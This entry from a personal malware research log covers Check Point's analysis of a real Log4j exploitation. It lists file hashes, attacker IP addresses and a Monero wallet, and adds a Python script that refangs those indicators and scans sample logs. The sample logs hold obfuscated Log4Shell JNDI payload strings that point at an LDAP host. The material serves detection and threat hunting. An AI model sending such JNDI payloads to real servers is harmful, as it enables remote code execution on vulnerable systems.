TT Malware Log

A personal research, study and reference log on malware, cyber attacks and analysis techniques

A deep dive into a real-life Log4j exploitation

【Figures】

Figure 1: Exploit variants.
Figure 2: The initial exploitation attempt sample.
Figure 3: Infection chain.
Figure 4: 0I8h4xuvxe PowerShell script.
Figure 5: StealthLoader copies itself to the Temp folder.
Figure 6: The malware uses the sleep function to suspend its own execution.
Figure 7: Obfuscation techniques to avoid static analysis.
Source: https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/


【Blog】

◆A deep dive into a real-life Log4j exploitation (Check Point, 2021/12/14)
[A thorough walkthrough of a real-world case of Log4j exploitation]
https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/


【Indicator information】

■Hash information (SHA-256)

457b254439cdbbc167b45abc09d9531b59ac7b104e847e453e5abd016991a6e2
8c4b72544f1791dd27e87f13a1c9d3070bb70f979e5e2ec98160f9f31945f33b

(The above is Check Point's information; source: https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/ )


■IP address information

188[.]126.89.151
52[.]114.77.236
176[.]12.177.110
87[.]71.62.56
95[.]101.133.173
2[.]21.7.180
2[.]56.59.123

(The above is Check Point's information; source: https://blog.checkpoint.com/2021/12/14/a-deep-dive-into-a-real-life-log4j-exploitation/ )


■Monero wallet

4AeriA3wiocD9gUjiw7qptRDfECriZJac8CgGbfUUPUmMSYtLE43dr2XXDN6t5vd1GWMeGjNFSDh5NUPKBKU3bBz8uatDoC
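
How the indicators above would actually be used in a hunt, as an added example for this log entry (it is not code from the Check Point post): the script refangs the IP list and validates the SHA-256 entries exactly as listed on this page, then sweeps sample logs for two things, (a) Log4j JNDI lookup strings in web requests, including the nested `${lower:..}`, `${upper:..}` and `${name:-default}` / `${::-x}` forms attackers use to hide the `jndi` keyword (matching the "exploit variants" shown in Figure 1), and (b) outbound connections to the listed IP addresses. The access-log and egress-log lines are constructed for the demo; 203.0.113.10 and 198.51.100.7 are RFC 5737 documentation addresses, not real infrastructure.

```python
"""Refang the IoCs listed on this page and sweep sample logs for obfuscated
Log4j JNDI lookups and contacts to the listed IPs.

Added example; not code from the Check Point post. Log lines below are
constructed, and 203.0.113.10 / 198.51.100.7 are documentation addresses.
"""
import ipaddress
import re
import urllib.parse

# Indicators as listed on this page (Check Point, 2021-12-14), still defanged.
DEFANGED_IPS = [
    "188[.]126.89.151", "52[.]114.77.236", "176[.]12.177.110",
    "87[.]71.62.56", "95[.]101.133.173", "2[.]21.7.180", "2[.]56.59.123",
]
SHA256_IOCS = [
    "457b254439cdbbc167b45abc09d9531b59ac7b104e847e453e5abd016991a6e2",
    "8c4b72544f1791dd27e87f13a1c9d3070bb70f979e5e2ec98160f9f31945f33b",
]


def refang(ioc: str) -> str:
    """Undo the usual defanging ('[.]' and 'hxxp') so the value can be matched."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def refanged_ips() -> set:
    """Refang the page's IP list; ipaddress.ip_address() rejects malformed entries."""
    return {str(ipaddress.ip_address(refang(ioc))) for ioc in DEFANGED_IPS}


def valid_sha256(h: str) -> bool:
    """True if h is a well-formed SHA-256 hex digest (64 hex characters)."""
    return re.fullmatch(r"[0-9a-fA-F]{64}", h) is not None


# Innermost ${...} lookup: no nested '${' or '}' inside the braces.
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(inner: str):
    """Resolve one innermost Log4j lookup to the literal it yields, or None.

    Covers the forms used to hide 'jndi': ${lower:X}, ${upper:X} and the
    default-value form ${name:-X} (including the empty-name ${::-X}).
    A jndi lookup itself is deliberately left in place.
    """
    if inner.lower().startswith("jndi:"):
        return None
    if ":-" in inner:
        return inner.split(":-", 1)[1]
    if inner.startswith("lower:"):
        return inner[len("lower:"):].lower()
    if inner.startswith("upper:"):
        return inner[len("upper:"):].upper()
    return None


def _sub(m: re.Match) -> str:
    resolved = _resolve(m.group(1))
    return m.group(0) if resolved is None else resolved


def normalize_lookups(s: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        new = LOOKUP_RE.sub(_sub, s)
        if new == s:
            break
        s = new
    return s


def is_log4shell_probe(line: str) -> bool:
    """URL-decode, collapse lookups, then look for a JNDI lookup."""
    return JNDI_RE.search(normalize_lookups(urllib.parse.unquote(line))) is not None


def scan_access_log(lines):
    """Return access-log lines carrying a (possibly obfuscated) JNDI lookup."""
    return [line for line in lines if is_log4shell_probe(line)]


DST_RE = re.compile(r"\bdst=(\S+)")


def scan_egress_log(lines, bad_ips):
    """Return egress-log lines whose destination is one of the listed IPs."""
    return [line for line in lines
            if (m := DST_RE.search(line)) and m.group(1) in bad_ips]


# Constructed sample lines (not real traffic): Apache-style access log with the
# lookup in the User-Agent or query string, and a simple egress/firewall log.
ACCESS_LOG = [
    '10.0.0.5 - - [14/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [14/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [14/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [14/Dec/2021:10:01:11 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7Ddi%3Aldap%3A%2F%2F203.0.113.10%2Fa%7D HTTP/1.1" 200 5 "-" "curl/7.79"',
]
EGRESS_LOG = [
    "2021-12-14T10:02:00Z src=10.0.0.20 dst=198.51.100.7 dport=443 action=allow",
    "2021-12-14T10:02:05Z src=10.0.0.20 dst=2.56.59.123 dport=80 action=allow",
]

if __name__ == "__main__":
    assert all(valid_sha256(h) for h in SHA256_IOCS), "malformed hash in IoC list"
    for hit in scan_access_log(ACCESS_LOG):
        print("JNDI lookup in request:", hit)
    for hit in scan_egress_log(EGRESS_LOG, refanged_ips()):
        print("contact with listed IP:", hit)
```

The normalisation only covers the three lookup forms named above, so other Log4j lookups (`${env:...}`, `${sys:...}` without a default, `${date:...}`) are left untouched and a string built purely from those would slip past; treat the check as a cheap triage filter over access logs, not as proof of absence, and pivot any hit to the file hashes and destination IPs listed above.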


【Search】

google: 457b254439cdbbc167b45abc09d9531b59ac7b104e847e453e5abd016991a6e2
google: 8c4b72544f1791dd27e87f13a1c9d3070bb70f979e5e2ec98160f9f31945f33b

google: "188.126.89.151"
google: "52.114.77.236"
google: "176.12.177.110"
google: "87.71.62.56"
google: "95.101.133.173"
google: "2.21.7.180"
google: "2.56.59.123"

google: "4AeriA3wiocD9gUjiw7qptRDfECriZJac8CgGbfUUPUmMSYtLE43dr2XXDN6t5vd1GWMeGjNFSDh5NUPKBKU3bBz8uatDoC"


【VirusTotal search】

https://www.virustotal.com/gui/file/457b254439cdbbc167b45abc09d9531b59ac7b104e847e453e5abd016991a6e2
https://www.virustotal.com/gui/file/8c4b72544f1791dd27e87f13a1c9d3070bb70f979e5e2ec98160f9f31945f33b

https://www.virustotal.com/gui/ip-address/188.126.89.151
https://www.virustotal.com/gui/ip-address/52.114.77.236
https://www.virustotal.com/gui/ip-address/176.12.177.110
https://www.virustotal.com/gui/ip-address/87.71.62.56
https://www.virustotal.com/gui/ip-address/95.101.133.173
https://www.virustotal.com/gui/ip-address/2.21.7.180
https://www.virustotal.com/gui/ip-address/2.56.59.123


Copyright (C) 谷川哲司 (Tetsuji Tanigawa) 1997 - 2023